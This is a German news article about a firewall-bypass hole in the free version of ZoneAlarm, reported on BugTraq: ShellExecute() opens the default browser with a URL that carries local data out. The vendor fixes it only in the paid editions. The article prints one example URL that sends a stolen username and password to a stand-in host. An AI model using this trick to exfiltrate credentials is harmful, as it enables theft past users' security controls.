ZoneAlarm mit Zweiklassensicherheit

Der Hersteller der Personal Firewall ZoneAlarm räumt die Existenz eines "theoretischen Sicherheitsproblems" in der kostenlosen Version seines Produkts ein. Zone Labs sieht aber keine Veranlassung, dieses zu beseitigen: Schließlich sei es in den kostenpflichtigen Versionen bereits behoben.

Ein [ http://www.securityfocus.com/archive/1/326371 Posting] auf der Mailing-Liste BugTraq beschreibt einen einfachen Weg, ZoneAlarm auszutricksen. Um an den Sperren der Personal Firewall vorbei Daten ins Internet zu übermitteln, kann ein Programm die Funktion ShellExecute() der Windows-Bibliothek shell32.dll mit einer URL aufrufen. Dann startet das System den Standard-Browser mit dieser URL. Der Browser darf normalerweise über Port 80 ins Internet und kann somit über eine URL wie etwa

http://evil.net/collect.cgi?stolen_username&pw=stolen_password

Daten vom lokalen Rechner an einen beliebigen Server senden.

In einer Antwort auf das Posting räumt Te Smith vom Hersteller Zone Labs die Existenz des Problems zwar ein. Als Abhilfe empfiehlt er jedoch lediglich den Umstieg auf die kostenpflichtigen Versionen ZoneAlarm Pro/Plus, die seit November 2002 beziehungsweise Februar 2003 solche ShellExecute-Aufrufe abfangen können. Eine Notwendigkeit, diese Funktion auch in die kostenlose Version einzubauen, sieht er nicht: "Wir haben die Sicherheit unseres kostenlosen ZoneAlarm kontinuierlich erhöht, [...], aber wir bauen nicht alle erweiterte Funktionen in dieses Basisprodukt ein", schließt er sein Posting.

Nun ist gerade die Kontrolle darüber, welche Programme mit dem Internet kommunizieren dürfen, eine der sinnvollen Anwendungen für eine Personal Firewall. Wenn Zone Labs also bewusst darauf verzichtet, die kostenlose Version gegen solch einfache Umgehungsversuche zu schützen, könnten sich viele Anwender deren Installation auch gleich sparen. Schließlich enthält Windows XP bereits die eingebaute Internetverbindungs-Firewall, mit der man Verbindungen von außen abblocken kann. (ju)